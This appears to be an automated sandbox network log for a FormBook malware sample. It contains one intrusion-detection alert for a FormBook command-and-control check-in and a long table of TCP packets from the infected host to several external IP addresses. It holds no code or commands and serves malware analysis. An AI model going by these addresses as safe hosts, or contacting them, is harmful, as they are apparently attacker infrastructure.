| 2024-11-11T17:06:32.861007+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49836 | 3.33.130.190 | 80 | TCP |

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 11, 2024 17:01:32.500325918 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:32.507740021 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:32.624914885 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.642644882 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:32.642924070 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:34.020762920 CET4975280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:34.138108015 CET80497523.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.038149118 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.174433947 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.174818039 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182434082 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182477951 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.182528973 CET4975380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:35.317460060 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317506075 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317534924 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317749977 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317825079 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:35.317861080 CET80497533.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.709615946 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.826877117 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.827078104 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.832010031 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.949286938 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974514961 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974656105 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.974890947 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.976670027 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:37.982419014 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:37.982639074 CET4975480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:01:38.093822956 CET80497543.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:01:43.501188993 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:43.748636961 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:43.748914957 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:43.756465912 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:44.003981113 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004575968 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004638910 CET8049755185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:44.004795074 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:45.268275023 CET4975580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.285738945 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.533102989 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.533329010 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.540749073 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:46.788149118 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.788795948 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.788821936 CET8049756185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:46.789041996 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:48.048962116 CET4975680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.066477060 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.313721895 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.314064980 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.321801901 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.321827888 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:49.569219112 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569272041 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569315910 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569354057 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569386959 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569432974 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.569487095 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570049047 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570102930 CET8049757185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:49.570290089 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:50.829775095 CET4975780192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:51.847007036 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.094563007 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.094813108 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.099905968 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.347430944 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348261118 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348331928 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348392010 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348445892 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348490000 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348524094 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:52.348542929 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.348812103 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.350677013 CET4975880192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:01:52.598259926 CET8049758185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.545526981 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.662703991 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.662960052 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.670465946 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.787633896 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805486917 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805496931 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805572033 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.805680037 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.805737972 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:57.813030005 CET8049759199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:01:57.813277006 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:01:59.171489954 CET4975980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.188925028 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.306332111 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.306541920 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.314034939 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.431447029 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449143887 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449215889 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449265957 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.449502945 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.449502945 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:00.456804991 CET8049760199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:00.457020998 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:01.827131987 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.844563961 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.974334002 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:02.974510908 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.982228994 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.982302904 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:03.099471092 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099478006 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099576950 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099584103 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099656105 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099661112 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099666119 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117254019 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117263079 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117343903 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117491961 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:03.124614000 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.124792099 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:04.498488903 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.515886068 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.633136988 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.633337975 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.638314009 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.755698919 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773503065 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773549080 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773576021 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773870945 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.775666952 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.780761003 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.780956030 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.893106937 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:10.953478098 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.243976116 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.244242907 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.256803989 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.547210932 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.561925888 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.561933994 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.562102079 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:12.762219906 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:13.779679060 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.071285009 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.071499109 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.079031944 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.370676994 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383464098 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383471012 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383642912 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:15.589781046 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.607150078 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.899795055 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:16.900038958 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907685041 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907705069 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907778978 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:17.200143099 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.200237989 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.200244904 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217278004 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217284918 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217473984 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:03:28.525780916 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.637692928 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:33.791141987 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:33.908333063 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:33.908494949 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:33.915977001 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:34.074290037 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560483932 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560492039 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560688972 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:35.431649923 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.449078083 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.566349983 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.566509008 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.574029922 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.732120991 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978610039 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978616953 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978771925 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:38.087294102 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.104726076 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.222028971 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.222181082 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.229911089 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.229935884 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.230006933 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.347254992 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.347357035 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.347487926 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075690985 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075707912 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075896978 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:40.743007898 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.760406017 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.877855062 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:41.878027916 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.883053064 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.041465998 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595132113 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595175028 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595444918 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.597268105 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.714520931 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:47.811136961 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.151885033 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.152043104 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.159785032 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.497725964 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564088106 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564110994 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564130068 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564156055 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564245939 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564265966 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564270020 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.564280987 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564295053 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564405918 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564409018 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564512968 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.564560890 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902060986 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902110100 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902118921 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902127028 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902277946 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902288914 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902297020 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902304888 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902307987 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902312994 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902319908 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902328014 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902422905 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902425051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902425051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902426004 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902451038 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902499914 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902621031 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902621984 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902818918 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902818918 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241247892 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241257906 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241267920 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241435051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241511106 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241545916 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241556883 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241564989 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241571903 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241580009 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241586924 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241588116 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241595030 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241602898 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241612911 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241622925 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241631031 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241874933 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241883993 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.242019892 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.242114067 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.662916899 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:50.680371046 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.041126966 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.041357994 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.048891068 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.393167019 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457091093 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457124949 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457142115 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457258940 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457278967 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457293987 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457297087 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.457305908 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457321882 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457335949 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457402945 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.457452059 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.488423109 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.488722086 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816201925 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816215038 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816303015 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816317081 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816359043 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816423893 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816452980 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816462994 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816473007 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816483021 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816493034 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816503048 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816512108 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816521883 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816545963 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816548109 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816555977 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816566944 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816576004 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816612959 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816672087 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816843033 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.844361067 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.844373941 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.844604015 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178433895 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178484917 CET804979343.156.106.109192.168.11.20
